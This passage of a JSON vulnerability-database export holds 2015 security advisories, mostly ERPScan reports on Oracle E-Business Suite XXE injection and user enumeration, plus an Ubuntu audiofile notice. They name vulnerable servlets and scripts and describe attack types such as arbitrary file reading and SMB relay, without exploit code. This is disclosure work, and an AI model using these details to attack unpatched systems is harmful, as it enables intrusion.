and distinguished by more\r\nthan 25 other awards, ERPScan is the leading SAP SE partner in\r\ndiscovering and resolving security vulnerabilities. ERPScan\r\nconsultants work with SAP SE in Walldorf to improve the security of\r\ntheir latest solutions.\r\nERPScan\u2019s primary mission is to close the gap between technical and\r\nbusiness security. We provide solutions to secure ERP systems and\r\nbusiness-critical applications from both cyber attacks and internal\r\nfraud. Our clients are usually large enterprises, Fortune 2000\r\ncompanies, and managed service providers whose requirements are to\r\nactively monitor and manage the security of vast SAP landscapes on a\r\nglobal scale.\r\nOur flagship product is ERPScan Security Monitoring Suite for SAP.\r\nThis multi award-winning innovative software is the only solution on\r\nthe market certified by SAP SE covering all tiers of SAP security:\r\nvulnerability assessment, source code review, and Segregation of\r\nDuties.\r\nThe largest companies from diverse industries like oil and gas,\r\nbanking, retail, even nuclear power installations as well as\r\nconsulting companies have successfully deployed the software. ERPScan\r\nSecurity Monitoring Suite for SAP is specifically designed for\r\nenterprises to continuously monitor changes in multiple SAP systems.\r\nIt generates and analyzes trends in user friendly dashboards, manages\r\nrisks, tasks, and can export results to external systems. These\r\nfeatures enable central management of SAP system security with minimal\r\ntime and effort.\r\nWe follow the sun and function in two hubs located in the Netherlands\r\nand the US to operate local offices and partner network spanning 20+\r\ncountries around the globe. This enables monitoring cyber threats in\r\nreal time and providing agile customer support.\r\n\r\nAdress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301\r\nPhone: 650.798.5255\r\nTwitter: @erpscan\r\nScoop-it: Business Application Security\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32657", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32657", "title": "[ERPSCAN-15-026] Oracle E-Business Suite - SQL injection Vulnerability", "type": "securityvulns", "cvss": {"score": 3.6, "vector": "AV:NETWORK/AC:HIGH/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-4886"], "description": "\r\n\r\n1. ADVISORY INFORMATION\r\n\r\nTitle: Oracle E-Business Suite XXE injection\r\nAdvisory ID: [ERPSCAN-15-028]\r\nAdvisory URL: http://erpscan.com/advisories/erpscan-15-028-oracle-e-business-suite-xxe-injection-vulnerability/\r\nDate published: 20.10.2015\r\nVendors contacted: Oracle\r\n\r\n2. VULNERABILITY INFORMATION\r\n\r\nClass: XML External Entity [CWE-611]\r\nImpact: information disclosure, DoS, SSRF, NTLM relay\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2015-4886\r\nCVSS Information\r\nCVSS Base Score: 6.4 / 10\r\nAV : Access Vector &#40;Related exploit range&#41; Network &#40;N&#41;\r\nAC : Access Complexity &#40;Required attack complexity&#41; Low &#40;L&#41;\r\nAu : Authentication &#40;Level of authentication needed to exploit&#41; None &#40;N&#41;\r\nC : Impact to Confidentiality Partial &#40;P&#41;\r\nI : Impact to Integrity Partial &#40;P&#41;\r\nA : Impact to Availability None &#40;N&#41;\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\n1&#41; An attacker can read an arbitrary file on a server by sending a\r\ncorrect XML request with a crafted DTD and reading the response from\r\nthe service.\r\n2&#41; An attacker can perform a DoS attack &#40;for example, XML Entity Expansion&#41;.\r\n3&#41; An SMB Relay attack is a type of Man-in-the-Middle attack where the\r\nattacker asks the victim to authenticate into a machine controlled by\r\nthe attacker, then relays the credentials to the target. The attacker\r\nforwards the authentication information both ways and gets access.\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nOracle E-Business Suite 12.1.3\r\n\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\nInstall Oracle CPU October 2015\r\n\r\n6. AUTHOR\r\nNikita Kelesis, Ivan Chalykin, Alexey Tyurin &#40;ERPScan&#41;\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\nVulnerable servlet:\r\n/OA_HTML/copxml\r\n\r\n8. REPORT TIMELINE\r\n\r\nReported: 17.07.2015\r\nVendor response: 24.07.2015\r\nDate of Public Advisory: 20.10.2015\r\n\r\n9. REFERENCES\r\n\r\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\r\nhttp://erpscan.com/advisories/erpscan-15-028-oracle-e-business-suite-xxe-injection-vulnerability/\r\n\r\n\r\n10. ABOUT ERPScan Research\r\nThe company\u2019s expertise is based on the research subdivision of\r\nERPScan, which is engaged in vulnerability research and analysis of\r\ncritical enterprise applications. It has achieved multiple\r\nacknowledgments from the largest software vendors like SAP, Oracle,\r\nMicrosoft, IBM, VMware, HP for discovering more than 400\r\nvulnerabilities in their solutions &#40;200 of them just in SAP!&#41;.\r\nERPScan researchers are proud to have exposed new types of\r\nvulnerabilities &#40;TOP 10 Web Hacking Techniques 2012&#41; and to be\r\nnominated for the best server-side vulnerability at BlackHat 2013.\r\nERPScan experts have been invited to speak, present, and train at 60+\r\nprime international security conferences in 25+ countries across the\r\ncontinents. These include BlackHat, RSA, HITB, and private SAP\r\ntrainings in several Fortune 2000 companies.\r\nERPScan researchers lead the project EAS-SEC, which is focused on\r\nenterprise application security research and awareness. They have\r\npublished 3 exhaustive annual award-winning surveys about SAP\r\nsecurity.\r\nERPScan experts have been interviewed by leading media resources and\r\nfeatured in specialized info-sec publications worldwide. These include\r\nReuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,\r\nHeise, and Chinabyte, to name a few.\r\nWe have highly qualified experts in staff with experience in many\r\ndifferent fields of security, from web applications and\r\nmobile/embedded to reverse engineering and ICS/SCADA systems,\r\naccumulating their experience to conduct the best SAP security\r\nresearch.\r\n\r\n\r\n11. ABOUT ERPScan\r\nERPScan is one of the most respected and credible Business Application\r\nSecurity providers. Founded in 2010, the company operates globally.\r\nNamed an Emerging vendor in Security by CRN and distinguished by more\r\nthan 25 other awards, ERPScan is the leading SAP SE partner in\r\ndiscovering and resolving security vulnerabilities. ERPScan\r\nconsultants work with SAP SE in Walldorf to improve the security of\r\ntheir latest solutions.\r\nERPScan\u2019s primary mission is to close the gap between technical and\r\nbusiness security. We provide solutions to secure ERP systems and\r\nbusiness-critical applications from both cyber attacks and internal\r\nfraud. Our clients are usually large enterprises, Fortune 2000\r\ncompanies, and managed service providers whose requirements are to\r\nactively monitor and manage the security of vast SAP landscapes on a\r\nglobal scale.\r\nOur flagship product is ERPScan Security Monitoring Suite for SAP.\r\nThis multi award-winning innovative software is the only solution on\r\nthe market certified by SAP SE covering all tiers of SAP security:\r\nvulnerability assessment, source code review, and Segregation of\r\nDuties.\r\nThe largest companies from diverse industries like oil and gas,\r\nbanking, retail, even nuclear power installations as well as\r\nconsulting companies have successfully deployed the software. ERPScan\r\nSecurity Monitoring Suite for SAP is specifically designed for\r\nenterprises to continuously monitor changes in multiple SAP systems.\r\nIt generates and analyzes trends in user friendly dashboards, manages\r\nrisks, tasks, and can export results to external systems. These\r\nfeatures enable central management of SAP system security with minimal\r\ntime and effort.\r\nWe follow the sun and function in two hubs located in the Netherlands\r\nand the US to operate local offices and partner network spanning 20+\r\ncountries around the globe. This enables monitoring cyber threats in\r\nreal time and providing agile customer support.\r\n\r\nAdress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301\r\nPhone: 650.798.5255\r\nTwitter: @erpscan\r\nScoop-it: Business Application Security\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32653", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32653", "title": "[ERPSCAN-15-028] Oracle E-Business Suite - XXE injection Vulnerability", "type": "securityvulns", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-4845"], "description": "\r\n\r\n1. ADVISORY INFORMATION\r\n\r\nTitle: Oracle E-Business Suite - Database user enumeration\r\nAdvisory ID: [ERPSCAN-15-025]\r\nAdvisory URL: http://erpscan.com/advisories/erpscan-15-025-oracle-e-business-suite-database-user-enumeration-vulnerability/\r\nDate published:20.10.2015\r\nVendors contacted: Oracle\r\n\r\n2. VULNERABILITY INFORMATION\r\n\r\nClass: User Enumeration\r\nImpact: user enumeration, SSRF\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2015-4845\r\nCVSS Information\r\nCVSS Base Score: 4.3 / 10\r\nAV : Access Vector &#40;Related exploit range&#41; Network &#40;N&#41;\r\nAC : Access Complexity &#40;Required attack complexity&#41; Medium &#40;M&#41;\r\nAu : Authentication &#40;Level of authentication needed to exploit&#41; None &#40;N&#41;\r\nC : Impact to Confidentiality Partial &#40;P&#41;\r\nI : Impact to Integrity None &#40;N&#41;\r\nA : Impact to Availability None &#40;N&#41;\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\nThere is a script in EBS that is used to connect to the database and\r\ndisplays the connection status. Different connection results can help\r\nan attacker to find existing database accounts.\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nOracle E-Business Suite 12.2.4\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\nInstall Oracle CPU October 2015\r\n\r\n6. AUTHOR\r\nNikita Kelesis, Ivan Chalykin, Alexey Tyurin, Egor Karbutov &#40;ERPScan&#41;\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\nDatabase users enumeration\r\nVunerable script: Aoljtest.js\r\n\r\n\r\n8. REPORT TIMELINE\r\n\r\nReported: 17.07.2015\r\nVendor response: 24.07.2015\r\nDate of Public Advisory: 20.10.2015\r\n\r\n9. REFERENCES\r\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\r\nhttp://erpscan.com/advisories/erpscan-15-025-oracle-e-business-suite-database-user-enumeration-vulnerability/\r\nhttp://erpscan.com/press-center/press-release/erpscan-took-a-closer-look-at-oracle-ebs-security-6-vulnerabilities-patched-in-recent-update/\r\n\r\n10. ABOUT ERPScan Research\r\nThe company\u2019s expertise is based on the research subdivision of\r\nERPScan, which is engaged in vulnerability research and analysis of\r\ncritical enterprise applications. It has achieved multiple\r\nacknowledgments from the largest software vendors like SAP, Oracle,\r\nMicrosoft, IBM, VMware, HP for discovering more than 400\r\nvulnerabilities in their solutions &#40;200 of them just in SAP!&#41;.\r\nERPScan researchers are proud to have exposed new types of\r\nvulnerabilities &#40;TOP 10 Web Hacking Techniques 2012&#41; and to be\r\nnominated for the best server-side vulnerability at BlackHat 2013.\r\nERPScan experts have been invited to speak, present, and train at 60+\r\nprime international security conferences in 25+ countries across the\r\ncontinents. These include BlackHat, RSA, HITB, and private SAP\r\ntrainings in several Fortune 2000 companies.\r\nERPScan researchers lead the project EAS-SEC, which is focused on\r\nenterprise application security research and awareness. They have\r\npublished 3 exhaustive annual award-winning surveys about SAP\r\nsecurity.\r\nERPScan experts have been interviewed by leading media resources and\r\nfeatured in specialized info-sec publications worldwide. These include\r\nReuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,\r\nHeise, and Chinabyte, to name a few.\r\nWe have highly qualified experts in staff with experience in many\r\ndifferent fields of security, from web applications and\r\nmobile/embedded to reverse engineering and ICS/SCADA systems,\r\naccumulating their experience to conduct the best SAP security\r\nresearch.\r\n\r\n\r\n11. ABOUT ERPScan\r\nERPScan is one of the most respected and credible Business Application\r\nSecurity providers. Founded in 2010, the company operates globally.\r\nNamed an Emerging vendor in Security by CRN and distinguished by more\r\nthan 25 other awards, ERPScan is the leading SAP SE partner in\r\ndiscovering and resolving security vulnerabilities. ERPScan\r\nconsultants work with SAP SE in Walldorf to improve the security of\r\ntheir latest solutions.\r\nERPScan\u2019s primary mission is to close the gap between technical and\r\nbusiness security. We provide solutions to secure ERP systems and\r\nbusiness-critical applications from both cyber attacks and internal\r\nfraud. Our clients are usually large enterprises, Fortune 2000\r\ncompanies, and managed service providers whose requirements are to\r\nactively monitor and manage the security of vast SAP landscapes on a\r\nglobal scale.\r\nOur flagship product is ERPScan Security Monitoring Suite for SAP.\r\nThis multi award-winning innovative software is the only solution on\r\nthe market certified by SAP SE covering all tiers of SAP security:\r\nvulnerability assessment, source code review, and Segregation of\r\nDuties.\r\nThe largest companies from diverse industries like oil and gas,\r\nbanking, retail, even nuclear power installations as well as\r\nconsulting companies have successfully deployed the software. ERPScan\r\nSecurity Monitoring Suite for SAP is specifically designed for\r\nenterprises to continuously monitor changes in multiple SAP systems.\r\nIt generates and analyzes trends in user friendly dashboards, manages\r\nrisks, tasks, and can export results to external systems. These\r\nfeatures enable central management of SAP system security with minimal\r\ntime and effort.\r\nWe follow the sun and function in two hubs located in the Netherlands\r\nand the US to operate local offices and partner network spanning 20+\r\ncountries around the globe. This enables monitoring cyber threats in\r\nreal time and providing agile customer support.\r\n\r\nAdress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301\r\nPhone: 650.798.5255\r\nTwitter: @erpscan\r\nScoop-it: Business Application Security\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32656", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32656", "title": "[ERPSCAN-15-025] Oracle E-Business Suite Database user enumeration Vulnerability", "type": "securityvulns", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-7747"], "description": "\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-2787-1\r\nOctober 28, 2015\r\n\r\naudiofile vulnerability\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 15.10\r\n- Ubuntu 15.04\r\n- Ubuntu 14.04 LTS\r\n- Ubuntu 12.04 LTS\r\n\r\nSummary:\r\n\r\naudiofile could be made to crash or run programs as your login if it\r\nopened a specially crafted file.\r\n\r\nSoftware Description:\r\n- audiofile: Open-source version of the SGI audiofile library\r\n\r\nDetails:\r\n\r\nFabrizio Gennari discovered that audiofile incorrectly handled changing\r\nboth the sample format and the number of channels. If a user or automated\r\nsystem were tricked into processing a specially crafted file, audiofile\r\ncould be made to crash, leading to a denial of service, or possibly execute\r\narbitrary code.\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 15.10:\r\n libaudiofile1 0.3.6-2ubuntu0.15.10.1\r\n\r\nUbuntu 15.04:\r\n libaudiofile1 0.3.6-2ubuntu0.15.04.1\r\n\r\nUbuntu 14.04 LTS:\r\n libaudiofile1 0.3.6-2ubuntu0.14.04.1\r\n\r\nUbuntu 12.04 LTS:\r\n libaudiofile1 0.3.3-2ubuntu0.1\r\n\r\nIn general, a standard system update will make all the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-2787-1\r\n CVE-2015-7747\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/audiofile/0.3.6-2ubuntu0.15.10.1\r\n https://launchpad.net/ubuntu/+source/audiofile/0.3.6-2ubuntu0.15.04.1\r\n https://launchpad.net/ubuntu/+source/audiofile/0.3.6-2ubuntu0.14.04.1\r\n https://launchpad.net/ubuntu/+source/audiofile/0.3.3-2ubuntu0.1\r\n\r\n\r\n\r\n\r\n-- \r\nubuntu-security-announce mailing list\r\nubuntu-security-announce@lists.ubuntu.com\r\nModify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32652", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32652", "title": "[USN-2787-1] audiofile vulnerability", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-4851"], "description": "\r\n\r\n1. ADVISORY INFORMATION\r\n\r\nTitle: Oracle E-Business Suite XXE injection\r\nAdvisory ID: [ERPSCAN-15-030]\r\nAdvisory URL: http://erpscan.com/advisories/erpscan-15-030-oracle-e-business-suite-xxe-injection-vulnerability/\r\nDate published: 20.10.2015\r\nVendors contacted: Oracle\r\n\r\n2. VULNERABILITY INFORMATION\r\n\r\nClass: XML External Entity [CWE-611]\r\nImpact: information disclosure, DoS, SSRF, NTLM relay\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2015-4851\r\nCVSS Information\r\nCVSS Base Score: 6.8 / 10\r\nAV : Access Vector &#40;Related exploit range&#41; Network &#40;N&#41;\r\nAC : Access Complexity &#40;Required attack complexity&#41; Medium &#40;M&#41;\r\nAu : Authentication &#40;Level of authentication needed to exploit&#41; None &#40;N&#41;\r\nC : Impact to Confidentiality Partial &#40;P&#41;\r\nI : Impact to Integrity Partial &#40;P&#41;\r\nA : Impact to Availability Partial &#40;P&#41;\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\n1&#41; An attacker can read an arbitrary file on a server by sending a\r\ncorrect XML request with a crafted DTD and reading the response from\r\nthe service.\r\n2&#41; An attacker can perform a DoS attack &#40;for example, XML Entity Expansion&#41;.\r\n3&#41; An SMB Relay attack is a type of Man-in-the-Middle attack where the\r\nattacker asks the victim to authenticate into a machine controlled by\r\nthe attacker, then relays the credentials to the target. The attacker\r\nforwards the authentication information both ways and gets access.\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nOracle E-Business Suite 12.1.3\r\n\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\nInstall Oracle CPU October 2015\r\n\r\n6. AUTHOR\r\nNikita Kelesis, Ivan Chalykin, Alexey Tyurin &#40;ERPScan&#41;\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\nVulnerable servlet:\r\n/OA_HTML/oramipp_lpr\r\n\r\n\r\n8. REPORT TIMELINE\r\n\r\nReported: 17.07.2015\r\nVendor response: 24.07.2015\r\nDate of Public Advisory: 20.10.2015\r\n\r\n9. REFERENCES\r\n\r\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\r\nhttp://erpscan.com/advisories/erpscan-15-030-oracle-e-business-suite-xxe-injection-vulnerability/\r\n\r\n10. ABOUT ERPScan Research\r\nThe company\u2019s expertise is based on the research subdivision of\r\nERPScan, which is engaged in vulnerability research and analysis of\r\ncritical enterprise applications. It has achieved multiple\r\nacknowledgments from the largest software vendors like SAP, Oracle,\r\nMicrosoft, IBM, VMware, HP for discovering more than 400\r\nvulnerabilities in their solutions &#40;200 of them just in SAP!&#41;.\r\nERPScan researchers are proud to have exposed new types of\r\nvulnerabilities &#40;TOP 10 Web Hacking Techniques 2012&#41; and to be\r\nnominated for the best server-side vulnerability at BlackHat 2013.\r\nERPScan experts have been invited to speak, present, and train at 60+\r\nprime international security conferences in 25+ countries across the\r\ncontinents. These include BlackHat, RSA, HITB, and private SAP\r\ntrainings in several Fortune 2000 companies.\r\nERPScan researchers lead the project EAS-SEC, which is focused on\r\nenterprise application security research and awareness. They have\r\npublished 3 exhaustive annual award-winning surveys about SAP\r\nsecurity.\r\nERPScan experts have been interviewed by leading media resources and\r\nfeatured in specialized info-sec publications worldwide. These include\r\nReuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,\r\nHeise, and Chinabyte, to name a few.\r\nWe have highly qualified experts in staff with experience in many\r\ndifferent fields of security, from web applications and\r\nmobile/embedded to reverse engineering and ICS/SCADA systems,\r\naccumulating their experience to conduct the best SAP security\r\nresearch.\r\n\r\n\r\n11. ABOUT ERPScan\r\nERPScan is one of the most respected and credible Business Application\r\nSecurity providers. Founded in 2010, the company operates globally.\r\nNamed an Emerging vendor in Security by CRN and distinguished by more\r\nthan 25 other awards, ERPScan is the leading SAP SE partner in\r\ndiscovering and resolving security vulnerabilities. ERPScan\r\nconsultants work with SAP SE in Walldorf to improve the security of\r\ntheir latest solutions.\r\nERPScan\u2019s primary mission is to close the gap between technical and\r\nbusiness security. We provide solutions to secure ERP systems and\r\nbusiness-critical applications from both cyber attacks and internal\r\nfraud. Our clients are usually large enterprises, Fortune 2000\r\ncompanies, and managed service providers whose requirements are to\r\nactively monitor and manage the security of vast SAP landscapes on a\r\nglobal scale.\r\nOur flagship product is ERPScan Security Monitoring Suite for SAP.\r\nThis multi award-winning innovative software is the only solution on\r\nthe market certified by SAP SE covering all tiers of SAP security:\r\nvulnerability assessment, source code review, and Segregation of\r\nDuties.\r\nThe largest companies from diverse industries like oil and gas,\r\nbanking, retail, even nuclear power installations as well as\r\nconsulting companies have successfully deployed the software. ERPScan\r\nSecurity Monitoring Suite for SAP is specifically designed for\r\nenterprises to continuously monitor changes in multiple SAP systems.\r\nIt generates and analyzes trends in user friendly dashboards, manages\r\nrisks, tasks, and can export results to external systems. These\r\nfeatures enable central management of SAP system security with minimal\r\ntime and effort.\r\nWe follow the sun and function in two hubs located in the Netherlands\r\nand the US to operate local offices and partner network spanning 20+\r\ncountries around the globe. This enables monitoring cyber threats in\r\nreal time and providing agile customer support.\r\n\r\nAdress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301\r\nPhone: 650.798.5255\r\nTwitter: @erpscan\r\nScoop-it: Business Application Security\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32655", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32655", "title": "[ERPSCAN-15-030] Oracle E-Business Suite - XXE injection Vulnerability", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}